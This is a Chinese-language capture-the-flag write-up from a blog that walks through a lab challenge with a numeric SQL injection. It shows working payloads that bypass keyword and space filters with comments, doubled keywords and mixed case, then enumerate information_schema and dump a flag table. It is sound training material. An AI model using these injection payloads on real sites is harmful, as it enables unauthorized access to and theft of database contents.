实验室每日一题WP-11月29日

打开题目,直接受到物理攻击。看到网页左下角提示

 

 于是尝试sql注入,/?id=1;得到回显,/?id=1' ;无回显,判断为数字型注入。

当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。
当输入的参数为字符串时,称为字符型。字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。

 

尝试查询字段数,经尝试过滤了空格 or ,于是用/**/代替空格 和双写绕过。

?id=1/**/oorderrder/**/by/**/1得到回显

测试为3个字段数,然后查询回显,发现select和union被过滤,发现双写绕过不行,于是尝试大小写绕过

?id=1/**/Union/**/Select/**/1,2,3

发现2,3为回显位,于是查询当前数据库名。

?id=1/**/Union/**/Select/**/1,2,database()

得到数据库名 text

 

查询表名

?id=1/**/Union/**/Select/**/1,2,group_concat(table_name)/**/frfromom/**/information_schema.tables/**/where/**/table_schema='text'

得到flag,users

 

获取列名

?id=1/**/uNion/**/Select/**/1,2,group_concat(column_name)/**/frfromom/**/information_schema.columns/**/where/**/table_name=%27flag%27

id,flag

 

查询字段值

?id=1/**/uNion/**/Select/**/1,2,flag/**/frfromom/**/flag

 得到flag

 

 

 flag{You have successfully!!!}

 

下次可以尝试直接爆破数据库密码了

 

 

 

posted @ 2020-11-29 13:05  Riddler  阅读(91)  评论(0编辑  收藏  举报